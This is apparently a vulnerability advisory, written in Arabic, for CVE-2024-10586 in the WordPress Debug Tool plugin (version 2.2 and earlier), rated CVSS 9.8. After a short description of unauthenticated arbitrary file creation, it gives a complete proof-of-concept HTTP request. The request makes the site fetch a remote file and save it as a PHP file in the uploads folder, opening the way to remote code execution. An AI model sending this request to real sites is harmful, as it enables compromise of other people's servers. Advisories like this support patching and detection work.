
Debug Tool <= 2.2 - إنشاء ملفات تعسفي بدون مصادقة
Debug Tool <= 2.2 - إنشاء ملفات عشوائية بدون مصادقة
تكون إضافة Debug Tool لـ WordPress عرضة لإنشاء ملفات عشوائية بسبب عدم وجود فحص للصلاحيات في الدالة dbt_pull_image() وعدم وجود تحقق من نوع الملف في جميع الإصدارات حتى الإصدار 2.2. وهذا يتيح للمهاجمين غير المصادق عليهم إنشاء ملفات عشوائية مثل ملفات .php التي يمكن استغلالها لتنفيذ التعليمات البرمجية عن بُعد.
CVE: CVE-2024-10586
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: debug-tool
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal/wp-admin/themes.php?page=themehunk-site-library&template=step
X-WP-Nonce: 47f8dbbb12
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 104
Origin: http://kubernetes.docker.internal
Connection: keep-alive
action=dbt_pull_image&source=http://rfi.nessus.org/rfi.txt&missed=/var/www/html/wp-content/uploads/t.php